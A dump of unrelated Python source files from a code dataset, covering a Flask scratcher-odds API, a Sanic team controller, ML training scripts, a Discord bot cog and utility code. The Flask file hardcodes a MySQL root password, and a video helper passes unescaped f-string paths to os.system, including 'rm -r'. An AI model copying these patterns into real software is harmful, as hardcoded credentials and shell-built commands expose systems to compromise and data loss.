results.find(\"p\", class_=\"scratchers-game-detail__info-feature-item scratchers-game-detail__info-feature-item--cash-odds\")\n \n odds_string = str(odds.text)\n\n colon_index = odds_string.index(\":\")\n substring = odds_string[colon_index + 1:].strip()\n\n #Parse integer from statement\n parts = substring.split(\"in\")\n\n # Turn odds string into decimal\n integer_part = parts[0].strip()\n float_part = parts[1].strip()\n\n integer_value = int(integer_part)\n float_value = float(float_part)\n\n #Odds in decimal form\n decimal_result = integer_value / float_value\n\n print(\"Odds: \" + str(decimal_result))\n\n \n #Retrieve Top Prize, Top Prize Odds, Top Prizes Left \n\n prize = results.find(\"tr\", class_=\"odds-available-prizes__table__body\")\n\n #Parse lines for relevant information\n lines = prize.text.splitlines()\n print(\"Top prize: $\" + lines[1])\n prize_num = int(''.join(filter(str.isdigit, lines[1])))\n\n print(\"Top Prize Odds: 1 in \" + str(lines[2]))\n match = re.search(r'\\d+', lines[4])\n\n if match:\n first_number = int(match.group())\n\n print(\"Top prizes left: \" + str(first_number))\n\n #Retrieve Image Source\n img = results.find(\"img\", class_=\"scratchers-game-detail__card-img scratchers-game-detail__card-img--unscratched\")\n \n src = img.get(\"src\")\n print(\"Image source: \" + str(src))\n\n #Retrieve Price\n price = results.find(\"p\", class_=\"scratchers-game-detail__info-price\")\n price_str = str(price.text)\n\n colon_index = price_str.index(\"$\")\n substring = price_str[colon_index + 1:].strip()\n\n print(\"Price: $\" + str(substring))\n print(\"\")\n return (scratcher_name.text, substring, decimal_result, prize_num, first_number, lines[2], src)\n\n#API call will return scratchers with best odds at requested price point\n\n\n\n@app.route('/api/scratchers/best-odds', methods=['GET'])\ndef get_scratcher_with_best_odds():\n try:\n \n scratcher_best_odds = []\n # Get the price point from the query parameters\n\n prices = request.args.get('prices').split(',')\n # Establish a connection to the MySQL server\n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n # Create a cursor object \n cursor = cnx.cursor()\n print(prices)\n\n # Execute a SELECT query to fetch the scratcher with the best odds at the specified price point\n for price in prices:\n query = \"SELECT * FROM scratchers WHERE price = %s ORDER BY odds DESC LIMIT 1\"\n cursor.execute(query, (price,))\n\n # Fetch the row of the result\n row = cursor.fetchone()\n\n # Check if a scratcher was found at the specified price point\n if row is not None:\n scratcher_best_odds.append({\n 'scratcher_name': row[0],\n 'price': row[1],\n 'odds': row[2],\n 'Top_Prize': row[3],\n 'Top_Prizes_Left': row[4],\n 'Top_Prize_Odds': row[5],\n 'img_source': row[6],\n })\n cursor.close()\n cnx.close()\n print(scratcher_best_odds)\n return jsonify(scratcher_best_odds), 200\n\n except mysql.connector.Error as err:\n # Handle MySQL errors and return appropriate error code and message\n error_message = \"There was an error retrieving scratcher data from MySQL database\"\n return jsonify({'error': error_message}), 500\n\n except Exception as e:\n # Handle other unexpected exceptions and return a generic error response\n err = \"error\"\n return jsonify({'An error occurred': err}), 500\n\n\n#Retrieve MySQL scratcher table\n@app.route('/api/scratchers', methods=['GET'])\ndef get_scratchers():\n try:\n app = Flask(__name__)\n\n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n \n # Create a cursor object\n cursor = cnx.cursor()\n \n # Execute a SELECT query to fetch data from the table\n query = \"SELECT * FROM scratchers\"\n cursor.execute(query)\n \n # Fetch all rows of the result\n rows = cursor.fetchall()\n \n # Convert the rows to a list of dictionaries\n data = []\n for row in rows:\n data.append({\n 'scratcher_name': row[0],\n 'price': row[1],\n 'odds': row[2],\n 'Top_Prize': row[3],\n 'Top_Prizes_Left': row[4],\n 'Top_Prize_Odds': row[5],\n 'img_source': row[6],\n })\n \n # Close the cursor and connection\n cursor.close()\n cnx.close()\n\n print(data)\n \n # Return the data as JSON\n return jsonify(data), 200\n\n except mysql.connector.Error as err:\n # Handle MySQL errors and return appropriate error code and message\n error_message = \"There was an error retrieving scratcher data from MySQL database\"\n return jsonify({'error': error_message}), 500\n\n except Exception as e:\n # Handle other unexpected exceptions and return a generic error response\n return jsonify({'error': 'An error occurred.'}), 500\n \n\n\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef catch_all(path):\n # Return a custom error response for the undefined routes\n return jsonify({'error': 'Route not found'}), 404\n\n\napp.run()\n","repo_name":"SamAbdel/CA-Scratcher-Tracker","sub_path":"Scratcher_API.py","file_name":"Scratcher_API.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71390564968","text":"from os.path import join as pjoin\nfrom pathlib import Path\nfrom PIL import Image\nimport os\nimport numpy as np\n\ndef save_imgs_to_video(output_path=\"video\", video_name=\"\"):\n os.system(f\"ffmpeg -framerate 30 -pattern_type glob -i '{output_path}/*.png' -c:v libx264 -pix_fmt yuv420p {video_name}.mp4 > /dev/null 2>&1\")\n # os.system(f\"rm -r {output_path}\")\n\nclass SimpleVideoRecorder():\n def __init__(self, camera, output=\"output.mp4\"):\n self.camera = camera\n self.counter = 0\n tmp = Path(output.parent) / \"tmp\" \n if not tmp.exists():\n # tmp.mkdir()\n tmp.mkdir(parents=True, exist_ok=True)\n self.folder = tmp\n self.output_fname = output\n\n def render(self):\n self.camera.take_picture()\n color = self.camera.get_color_rgba()\n fname = self.folder / f\"output-{self.counter:04d}.png\"\n Image.fromarray((color[..., :3].clip(0, 1) * 255).astype(np.uint8)).save(fname)\n self.counter = self.counter + 1\n\n def dump(self):\n fpath = self.folder.absolute()\n os.system(f\"ffmpeg -framerate 30 -pattern_type glob -i '{fpath}/output-*.png' -c:v libx264 -pix_fmt yuv420p {self.output_fname}.mp4 > /dev/null 2>&1\")\n os.system(f\"rm -r {fpath}\")","repo_name":"geng-haoran/GraspPolicy","sub_path":"utils/visu.py","file_name":"visu.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71252771368","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\ndef mock_data(min_val=0, center=3., df=3, size=10000):\n p = np.random.chisquare(df=df, size=size) \n p = p * ((center-min_val) * 1. / df) + min_val\n p = p.astype(int)\n return p\n\n\n\ndef height_weight_mock(min_height=145, mid_height=175, df=6, size=1000):\n h = mock_data(min_val=min_height, center=mid_height, df=df, size=size)\n h[h>220] = mid_height + int(np.random.normal(scale=5))\n w = h - 105\n w += np.random.normal(scale=w/5.)\n return h, w\n\n\n\n\ndef height_weight_file(save_path, size=1000):\n h, w = height_weight_mock(size=size)\n i = np.arange(1, size+1)\n d = np.hstack((i.reshape(-1, 1), \n h.reshape(-1, 1), \n w.reshape(-1, 1)))\n np.savetxt(save_path, d, fmt='%s')","repo_name":"KG-book/EntityMining","sub_path":"chapter2/src/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"11729176106","text":"#!/usr/bin/env python3\n\nimport argparse\nparser = argparse.ArgumentParser(description=\"\"\"\ntrains a variational autoencoder on text.\nlogs validation statistics per 250 steps;\nsaves a ckeckpoint per 10000 steps aka one round;\nthe ckeckpoints are named after the trial name and the training round.\ndetails are specified in the config file.\n\"\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--trial', default=\"master\", help=\"the trial name\")\nparser.add_argument('--config', default=\"config.json\", help=\"the config file\")\nparser.add_argument('--ckpt', default=None, help=\"the ckeckpoint to resume\")\nparser.add_argument('--gpu', default=\"0\", help=\"the gpu to use\")\nparser.add_argument('--seed', default=0, type=int, help=\"random seed\")\nparser.add_argument('--rounds', default=0, type=int, help=\"numbers of training rounds\")\nparser.add_argument('--prefetch', default=16, type=int, help=\"numbers of batches to prefetch\")\nparser.add_argument('--sample', action='store_true', help=\"train with sentencepiece sampling\")\nparser.add_argument('--profile', action='store_true', help=\"run tensorboard profile\")\nA = parser.parse_args()\n\nimport sys\nif not A.rounds and not A.profile: sys.exit(\"nothing to do\")\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = A.gpu\n\n###############\n# preparation #\n###############\n\nfrom util import Record, comp\nfrom model import vAe as vae\nfrom tqdm import tqdm\nfrom util_io import pform, load_txt, load_json\nfrom util_np import np, vpack, sample, partition\nfrom util_sp import load_spm, encode_capped, encode_capped_sample_pair\nfrom util_tf import tf, pipe\n\nconfig = load_json(A.config)\nP = Record(config['paths'])\nC = Record(config['model'])\nT = Record(config['train'])\n\ntf.set_random_seed(A.seed)\n\n#############\n# load data #\n#############\n\nvocab = load_spm(P.vocab)\nvalid = np.load(P.valid)\n\ndef batch(size=T.batch_train, path=P.train, vocab=vocab, seed=A.seed, kudo=A.sample, max_len=T.max_len):\n pac = lambda arrs: vpack(arrs, (size, max(map(len, arrs))), eos, np.int32)\n enc = encode_capped_sample_pair if kudo else encode_capped\n raw = tuple(load_txt(path))\n eos = vocab.eos_id()\n bat = []\n for i in sample(len(raw), seed):\n if size == len(bat):\n if kudo:\n src , tgt = map(pac, zip(*bat))\n else:\n src = tgt = pac(bat)\n yield src, tgt\n bat = []\n bat.append(enc(vocab, raw[i], cap=max_len))\n\n###############\n# build model #\n###############\n\nmodel_valid = vae('valid', **C)\n\nif A.profile:\n from util_tf import profile\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n with tf.summary.FileWriter(pform(P.log, A.trial), sess.graph) as wtr:\n profile(sess, wtr, model_valid.loss, {model_valid.src: valid[:32], model_valid.tgt: valid[:32]})\nif not A.rounds: sys.exit(\"profiling done\")\n\nsrc, tgt = pipe(batch, (tf.int32, tf.int32), prefetch= A.prefetch)\nmodel_train = vae('train', src=src, tgt=tgt, **C)\n\n############\n# training #\n############\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nif A.ckpt:\n saver.restore(sess, pform(P.ckpt, A.ckpt))\nelse:\n tf.global_variables_initializer().run()\n\nwtr = tf.summary.FileWriter(pform(P.log, A.trial))\nsummary = tf.summary.merge(\n (tf.summary.scalar('step_errt' , model_valid.errt ),\n tf.summary.scalar('step_loss_gen', model_valid.loss_gen),\n tf.summary.scalar('step_loss_kld', model_valid.loss_kld)))\n\ndef summ(step, model=model_valid):\n wtr.add_summary(\n sess.run(summary, dict(zip(\n (model.errt, model.loss_gen, model.loss_kld),\n map(comp(np.mean, np.concatenate),\n zip(*(sess.run((model.errt_samp, model.loss_gen_samp, model.loss_kld_samp),\n {model.src: valid[i:j], model.tgt: valid[i:j]})\n for i, j in partition(len(valid), T.batch_valid, discard= False))))))),\n step)\n wtr.flush()\n\nfor _ in range(A.rounds):\n for _ in range(40):\n for _ in tqdm(range(250), ncols= 70):\n sess.run(model_train.train_step)\n step = sess.run(model_train.step)\n summ(step)\n saver.save(sess, pform(P.ckpt, A.trial, step // 10000), write_meta_graph= False)\n","repo_name":"argsim/argsim","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31681947132","text":"from django.db import models\n\n\nclass List(models.Model):\n name = models.TextField(max_length=30, blank=False, null=True)\n\n\nclass Item(models.Model):\n text = models.TextField()\n list = models.ForeignKey(List, blank=False, null=True)\n\n # Create a random list if not provided\n def save(self, *args, **kwargs):\n if not self.list:\n list_ = List.objects.create()\n list_.save()\n self.list = list_\n super(Item, self).save(*args, **kwargs)\n","repo_name":"HassenPy/tdd-goat","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42103381041","text":"import asyncio\nimport aiofiles\nimport base64\nimport os\nfrom pathlib import Path\nfrom bson import ObjectId\nfrom async_files.utils import async_wraps\n\nfrom sanic.log import logger\nfrom sanic_openapi import doc\nfrom sanic.response import json, file\nfrom sanic import Blueprint\nfrom sanic.views import HTTPMethodView\n\nfrom ..util import async_rmtree\nfrom ..util.decorator import token_required\nfrom ..model.database import User, Organization, Team, Test, TestResult, TaskQueue, Task\n\nfrom ..service.auth_helper import Auth\nfrom ..util.dto import TeamDto, json_response\nfrom ..util.response import response_message, EINVAL, ENOENT, SUCCESS, EEXIST, EPERM, USER_NOT_EXIST, TOKEN_REQUIRED, TOKEN_ILLEGAL\nfrom ..config import get_config\nfrom ..util.identicon import render_identicon\n\nUSERS_ROOT = Path(get_config().USERS_ROOT)\n\n_user = TeamDto.user\n_user_list = TeamDto.user_list\n_team_list = TeamDto.team_list\n_new_team = TeamDto.new_team\n_team_id = TeamDto.team_id\n_team_avatar = TeamDto.team_avatar\n\n\nbp = Blueprint('team', url_prefix='/team')\n\nclass TeamView(HTTPMethodView):\n @doc.summary('List all teams joined by the logged in user')\n @doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.produces(_team_list)\n @token_required\n async def get(self, request):\n ret = []\n check = []\n user = request.ctx.user\n\n async for team in Team.find({'owner': user.pk}):\n owner = await team.owner.fetch()\n organization = await team.organization.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': str(organization.pk),\n 'value': str(team.id)\n })\n check.append(team)\n\n for team in user.teams:\n if team in check:\n continue\n organization = await team.organization.fetch()\n owner = await team.owner.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': str(organization.pk),\n 'value': str(team.id)\n })\n\n return json(response_message(SUCCESS, teams=ret))\n\n @doc.summary('create a new team')\n @doc.description('The logged in user performing the operation will become the owner of the team')\n @doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.consumes(_new_team, location='body')\n @doc.produces(json_response)\n @token_required\n async def post(self, request):\n data = request.json\n user = request.ctx.user\n\n name = data.get('name', None)\n if not name:\n return json(response_message(EINVAL, 'Field name is required'))\n\n organization_id = data.get('organization_id', None)\n if not organization_id:\n return json(response_message(EINVAL, 'Field organization_id is required'))\n \n organization = await Organization.find_one({'_id': ObjectId(organization_id)})\n if not organization:\n return json(response_message(ENOENT, 'Organization not found'))\n\n if organization.owner != user:\n return json(response_message(EINVAL, 'Your are not the organization\\'s owner'))\n\n team = await Team.find_one({'name': name, 'organization': organization.pk})\n if team:\n return json(response_message(EEXIST, 'Team has been registered'))\n\n team = Team(name=name, organization=organization.pk, owner=user.pk)\n team.members.append(user)\n await team.commit()\n user.teams.append(team)\n await user.commit()\n organization.teams.append(team)\n await organization.commit()\n\n team.path = name + '#' + str(team.id)\n team_root = USERS_ROOT / organization.path / team.path\n try:\n await aiofiles.os.mkdir(team_root)\n except FileExistsError as e:\n return json(response_message(EEXIST))\n\n img = await render_identicon(hash(name), 27)\n await async_wraps(img.save)(team_root / ('%s.png' % team.id))\n team.avatar = '%s.png' % team.id\n await team.commit()\n\n return json(response_message(SUCCESS))\n\n @doc.summary('delete a team')\n @doc.description('Only the owner of the team or the organization that the team belongs to could perform this operation')\n @doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.consumes(_team_id, location='body')\n @doc.produces(json_response)\n @token_required\n async def delete(self, request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, \"Team not found\"))\n\n user = request.ctx.user\n organization = await team.organization.fetch()\n if await team.owner.fetch() != user:\n if await organization.owner.fetch() != user:\n return json(response_message(EINVAL, 'You are not the team owner'))\n\n organization.teams.remove(team)\n await organization.commit()\n\n try:\n await async_rmtree(USERS_ROOT / organization.path / team.path)\n except FileNotFoundError:\n pass\n\n user.teams.remove(team)\n await user.commit()\n\n async for test in Test.find({'team': team.pk}):\n async for task in Task.find({'test': test.pk}):\n async for ts in TestResult.find({'task': task.pk}):\n await ts.delete()\n await task.delete()\n await test.delete()\n async for queue in TaskQueue.find({'team': team.pk}):\n queue.to_delete = True\n queue.organization = None\n queue.team = None\n await queue.commit()\n await team.delete()\n\n return json(response_message(SUCCESS))\n\n@bp.get('/avatar/')\n@doc.summary('get the avatar of a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.produces(_team_avatar)\n@token_required\nasync def handler(request, team_id):\n user = request.ctx.user\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if team:\n organization = await team.organization.fetch()\n async with aiofiles.open(USERS_ROOT / organization.path / team.path / team.avatar, 'rb') as img:\n _, ext = os.path.splitext(team.avatar)\n return json(response_message(SUCCESS, type=f'image/{ext[1:]}', data=base64.b64encode(await img.read()).decode('ascii')))\n return json(response_message(USER_NOT_EXIST, 'Team not found'))\n\n@bp.delete('/member')\n@doc.summary('let current logged in user quit the team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id, location='body')\n@doc.produces(json_response)\n@token_required\nasync def handler(request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n team_to_quit = await Team.find_one({'_id': ObjectId(team_id)})\n if not team_to_quit:\n return json(response_message(ENOENT, \"Team not found\"))\n\n user = request.ctx.user\n\n for team in user.teams:\n if team != team_to_quit:\n continue\n if await team.owner.fetch() == user:\n return json(response_message(EPERM, \"Can't quit the team as you are the owner\"))\n team.members.remove(user)\n await team.commit()\n user.teams.remove(team)\n await user.commit()\n return json(response_message(SUCCESS))\n else:\n return json(response_message(EINVAL, \"User is not in the team\"))\n\n@bp.get('/all')\n@doc.summary('list all teams of an organization')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(doc.String(name='organization_id', description='The organization ID'))\n@doc.produces(_team_list)\n@token_required\nasync def handler(request):\n ret = []\n\n organization_id = request.args.get('organization_id', None)\n if not organization_id:\n return json(response_message(EINVAL, 'Field organization_id is required'))\n\n user = request.ctx.user\n organization = await Organization.find_one({'_id': ObjectId(organization_id)})\n if not organization:\n return json(response_message(ENOENT, 'Organization not found'))\n if user not in organization.members:\n return json(response_message(EPERM, 'You are not a member of the organization'))\n\n async for team in Team.find({'organization': ObjectId(organization_id)}):\n owner = await team.owner.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': organization_id,\n 'value': str(team.pk)\n })\n return json(response_message(SUCCESS, teams=ret))\n\n@bp.post('/join')\n@doc.summary('join a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id, location='body')\n@doc.produces(json_response)\n@token_required\nasync def handler(request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n user = request.ctx.user\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, 'Team not found'))\n\n if user not in team.members:\n team.members.append(user)\n await team.commit()\n if team not in user.teams:\n user.teams.append(team)\n await user.commit()\n\n return json(response_message(SUCCESS))\n\n@bp.get('/users')\n@doc.summary('list all users of a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id)\n@doc.produces(_user_list)\n@token_required\nasync def handler(request):\n user = request.ctx.user\n\n team_id = request.args.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, 'Field team_id is required'))\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, 'Team not found'))\n\n if user not in team.members:\n if user not in team.organization.members:\n return json(response_message(EPERM, 'You are not in the organization'))\n\n ret = []\n for member in team.members:\n m = await member.fetch()\n ret.append({\n 'value': str(m.pk),\n 'label': m.name,\n 'email': m.email\n })\n return json(response_message(SUCCESS, users=ret))\n\nbp.add_route(TeamView.as_view(), '/')\n","repo_name":"pansila/Auto-Test-System","sub_path":"webserver/app/main/controller/team_controller.py","file_name":"team_controller.py","file_ext":"py","file_size_in_byte":10830,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"4942510549","text":"from .models import Template\n\n\nkeys = Template.keys.all()\nmessages = Template.messages.all()\n\nsmiles = Template.smiles.all()\n\n\nclass Keys():\n MENU = keys[0].body\n START = keys[1].body\n AGE_LESS_18 = keys[2].body\n AGE_BETWEEN_18_21 = keys[3].body\n AGE_GREAT_21 = keys[4].body\n INCOME_NO_MATTER = keys[5].body\n INCOME_UP_TO_30 = keys[6].body\n INCOME_BEETWEEN_30_45 = keys[7].body\n INCOME_FROM_40 = keys[8].body\n YES = keys[9].body\n NO = keys[10].body\n\n\nclass Messages():\n QUESTION_AGE = messages[0].body\n WELCOME = messages[1].body\n QUESTION_INCOME = messages[2].body\n AGE_LESS_18 = messages[3].body\n INCOME_LESS_30_ADVICE = messages[4].body\n CASH_LINKS_LIST = messages[5].body\n ASK_FOR_LOANS = messages[6].body\n WRITE_REVIEW = messages[7].body\n LOANS_NO_RECEIVED = messages[8].body\n AFTER_WRITE_REVIEW = messages[9].body\n GOOD_BYE = messages[10].body\n\n\nclass Smiles():\n SMILE = smiles[0].body\n","repo_name":"archon1999/VKCashBot","sub_path":"app/backend/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75140482728","text":"#!/usr/bin/env python3\nimport asyncio\nimport discord\nimport os\nfrom discord.ext import commands\n\n\nclass VerifyCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # Current Verification method\n @commands.command(aliases=[\"verification\"])\n async def verify(self, ctx, announcement_role=None):\n try:\n if str(ctx.message.channel) == os.getenv(\"WELCOME_CHANNEL\"):\n role = discord.utils.get(ctx.guild.roles, name=\"Member\")\n await ctx.message.author.add_roles(role)\n flag = 0\n if announcement_role == \"announcement\":\n role = discord.utils.get(ctx.guild.roles, name=\"Announcements\")\n await ctx.message.author.add_roles(role)\n flag += 1\n botchannel = discord.utils.get(ctx.message.author.guild.channels, name=os.getenv(\"BOT_COMMAND_CHANNEL\"))\n try:\n await ctx.message.author.send(\n f'Welcome to the server {ctx.message.author.mention}!\\n'\n f'We are glad to have you here. If you wanna go through quick server description please go to {botchannel.mention} '\n f'and enter command `$chdesc` to get a description of almost every channel and `$faq` to get frequently asked questions. '\n f'We hope you enjoy your stay and contribute in our community : )\\n'\n )\n except:\n await ctx.send(f'Welcome to the server {ctx.message.author}! We are glad to have you here :D\\n\\n')\n channel = discord.utils.get(ctx.message.author.guild.channels, name='verifications-help')\n if(flag==1):\n await channel.send(f'{ctx.message.author.mention} successfully verified. Roles given: `Member` and `Announcement`.')\n else:\n await channel.send(\n f\"{ctx.message.author.mention} successfully verified. Roles given `Member`.\"\n )\n else:\n await ctx.send(\"Command only works in #\"+os.getenv(\"WELCOME_CHANNEL\")+\" channel : )\")\n await asyncio.sleep(3)\n await ctx.message.delete()\n except:\n await ctx.send(\n \"Some error happened while executing the command, please reach out to moderators/admins.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(VerifyCog(bot))\n print(\"Verification cog loaded\")\n","repo_name":"Fumenoid/JHDBot","sub_path":"JHDBot/cogs/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"30466892900","text":"\nfrom model.base_model import *\nimport numpy as np\nimport quadprog\n\ndef store_grad(pp, grads, grad_dims, tid):\n \"\"\"\n This stores parameter gradients of past tasks.\n pp: parameters\n grads: gradients\n grad_dims: list with number of parameters per layers\n tid: task id\n \"\"\"\n # store the gradients\n grads[:, tid].fill_(0.0)\n cnt = 0\n for param in pp():\n if param.grad is not None:\n beg = 0 if cnt == 0 else sum(grad_dims[:cnt])\n en = sum(grad_dims[:cnt + 1])\n grads[beg: en, tid].copy_(param.grad.data.view(-1))\n cnt += 1\n\n\ndef overwrite_grad(pp, newgrad, grad_dims):\n \"\"\"\n This is used to overwrite the gradients with a new gradient\n vector, whenever violations occur.\n pp: parameters\n newgrad: corrected gradient\n grad_dims: list storing number of parameters at each layer\n \"\"\"\n cnt = 0\n for param in pp():\n if param.grad is not None:\n beg = 0 if cnt == 0 else sum(grad_dims[:cnt])\n en = sum(grad_dims[:cnt + 1])\n this_grad = newgrad[beg: en].contiguous().view(\n param.grad.data.size())\n param.grad.data.copy_(this_grad)\n cnt += 1\n\n\ndef project2cone2(gradient, memories, margin=0.5, eps=1e-3):\n \"\"\"\n Solves the GEM dual QP described in the paper given a proposed\n gradient \"gradient\", and a memory of task gradients \"memories\".\n Overwrites \"gradient\" with the final projected update.\n input: gradient, p-vector\n input: memories, (t * p)-vector\n output: x, p-vector\n \"\"\"\n memories_np = memories.cpu().t().double().numpy()\n gradient_np = gradient.cpu().contiguous().view(-1).double().numpy()\n t = memories_np.shape[0]\n P = np.dot(memories_np, memories_np.transpose())\n P = 0.5 * (P + P.transpose()) + np.eye(t) * eps\n q = np.dot(memories_np, gradient_np) * -1\n G = np.eye(t)\n h = np.zeros(t) + margin\n v = quadprog.solve_qp(P, q, G, h)[0]\n x = np.dot(v, memories_np) + gradient_np\n gradient.copy_(torch.Tensor(x).view(-1, 1))\n\n\n\n\nclass GEM(nn.Module):\n def __init__(self, model, data, args):\n super(GEM, self).__init__()\n self.data = data\n self.n_task = args.n_task\n self.model = model(data, args)\n\n self.n_memory = args.n_memory\n self.margin = args.memory_strength\n self.cuda = args.cuda\n self.output_size = self.model.output_size\n\n\n # allocate episodic memory\n self.memory_inputs = torch.FloatTensor(self.n_task, self.n_memory, *models_setting[self.data].input_size)\n self.memory_labels = torch.LongTensor(self.n_task, self.n_memory)\n # allocate temporary synaptic memory\n self.grad_dims = []\n for param in self.parameters():\n self.grad_dims.append(param.data.numel())\n self.grads = torch.Tensor(sum(self.grad_dims), self.n_task)\n\n if self.cuda:\n self.memory_inputs = self.memory_inputs.cuda()\n self.memory_labels = self.memory_labels.cuda()\n self.grads = self.grads.cuda()\n\n self.observed_tasks = []\n self.old_task = -1\n self.mem_cnt = 0\n if self.data == 'cifar100':\n self.nc_per_task = int(self.model.hidden_sizes[-1] / self.n_task)\n else:\n self.nc_per_task = self.model.hidden_sizes[-1]\n\n def forward(self, x):\n y = self.model(x)\n return y\n\n\n def train_step(self, inputs, labels, get_class_offset, t):\n if t != self.old_task:\n self.observed_tasks.append(t)\n self.old_task = t\n\n self.train()\n # Update ring buffer storing examples from current task\n bsz = labels.data.size(0)\n endcnt = min(self.mem_cnt + bsz, self.n_memory)\n effbsz = endcnt - self.mem_cnt\n self.memory_inputs[t, self.mem_cnt: endcnt].copy_(\n inputs.data[: effbsz])\n if bsz == 1:\n self.memory_labels[t, self.mem_cnt] = labels.data[0]\n else:\n self.memory_labels[t, self.mem_cnt: endcnt].copy_(labels.data[: effbsz])\n self.mem_cnt += effbsz\n if self.mem_cnt >= self.n_memory:\n self.mem_cnt = 0\n\n # compute gradient on previous tasks\n if len(self.observed_tasks) > 1:\n for tt in range(len(self.observed_tasks) - 1):\n self.zero_grad()\n # fwd/bwd on the examples in the memory\n past_task = self.observed_tasks[tt]\n\n ptlogits = self.forward(self.memory_inputs[past_task])\n\n pt_class_offset = get_class_offset(past_task)\n\n ptloss = self.model.loss_fn(*self.model.compute_output_offset(ptlogits, self.memory_labels[past_task], *pt_class_offset))\n ptloss.backward()\n store_grad(self.parameters, self.grads, self.grad_dims, past_task)\n\n # now compute the grad on the current minibatch\n self.zero_grad()\n logits = self.forward(inputs)\n class_offset = get_class_offset(t)\n logits, labels = self.model.compute_output_offset(logits, labels, *class_offset)\n loss = self.model.loss_fn(logits, labels)\n loss.backward()\n\n # check if gradient violates constraints\n if len(self.observed_tasks) > 1:\n # copy gradient\n store_grad(self.parameters, self.grads, self.grad_dims, t)\n indx = torch.cuda.LongTensor(self.observed_tasks[:-1]) if self.cuda \\\n else torch.LongTensor(self.observed_tasks[:-1])\n dotp = torch.mm(self.grads[:, t].unsqueeze(0),\n self.grads.index_select(1, indx))\n if (dotp < 0).sum() != 0:\n project2cone2(self.grads[:, t].unsqueeze(1),\n self.grads.index_select(1, indx), self.margin)\n # copy gradients back\n overwrite_grad(self.parameters, self.grads[:, t], self.grad_dims)\n self.model.optimizer.step()\n acc = torch.eq(torch.argmax(logits, dim=1), labels).float().mean()\n\n return float(loss.item()), float(acc.item())\n\n def predict(self, inputs, t):\n return self.model.predict(inputs, t)","repo_name":"ssssss489/RACIL","sub_path":"model/GEM.py","file_name":"GEM.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16364715805","text":"# 중복순열\nfrom itertools import product\ndef solution(numbers, target):\n answer = 0\n for c in list(product([1, -1], repeat=len(numbers))):\n check = 0\n for j in range(len(numbers)):\n check += c[j] * numbers[j]\n if check == target:\n answer += 1\n return answer","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/Programmers/완전탐색/타겟 넘버_product.py","file_name":"타겟 넘버_product.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9118184027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"Casper Wang\"\n__email__ = \"casprwang@gmail.com\"\n\n# expireDate\n# http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date=201706\n\nimport urllib.request\nimport json\nimport csv\nimport datetime\n\n\nFRONTROW = [\n 'Date', '买量', '买价bid', '最新价last', '卖价ask', '卖量', '振幅%change', '涨跌幅change',\n '行权strike', '买量', '买价', '最新价', '卖价', '卖量', '振幅', '涨跌幅', 